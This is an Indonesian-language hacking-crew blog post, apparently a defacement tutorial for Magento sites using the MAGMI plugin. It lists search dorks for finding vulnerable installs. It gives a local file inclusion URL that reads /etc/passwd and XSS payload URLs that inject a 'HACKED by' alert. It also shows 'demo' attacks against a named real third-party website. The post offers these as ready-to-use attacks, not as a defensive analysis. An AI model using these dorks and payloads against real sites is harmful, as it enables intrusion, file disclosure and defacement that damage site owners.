Deface Web Metode Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting

Hai ART-Team family :)
Kali ini saya mo ngasi tutor yg ane sendiri masih bingung gunainnya >_<


[+] DORK :
inurl:/media/magmi/magmi/web/
inurl:/web/magmi_import_run.php
inurl:/old-site/magmi/web/
inurl:/magmi/web/magmi.php?
index of /media/magmi/magmi/web/css/

[+] VULN :

 

[+] EXPLOIT LFI :
www.NDAS.mu/[path]/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

[+] EXPLOIT XSS :
www.NDAS.mu/[path]/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E

www.NDAS.mu/[path]/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27HACKED by _MisterNotFound_%27%29;%3C/script%3E

 [+] DEMO LFI :
http://www.gooddrop.com.au/media/magmi/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility

[+] DEMO XSS :
http://www.gooddrop.com.au/media/magmi/magmi/web/magmi_import_run.php?%3C%2Fscript%3E%3Cscript%3Ealert%28%27HACKED+by+_MisterNotFound_%27%29%3B%3C%2Fscript%3E 



Sekian tutorial dari _MisterNotFound_
Selamat menjalani ibadah puasa Ramadhan ;)
Jangan lupa untuk like fanspage tim kami di facebook ;)
Terimakasih.
Wassalamualaikum Wr. Wb.



Penulis : _MisterNotFound_

Share this

Related Posts

Previous
Next Post »

5 comments

comments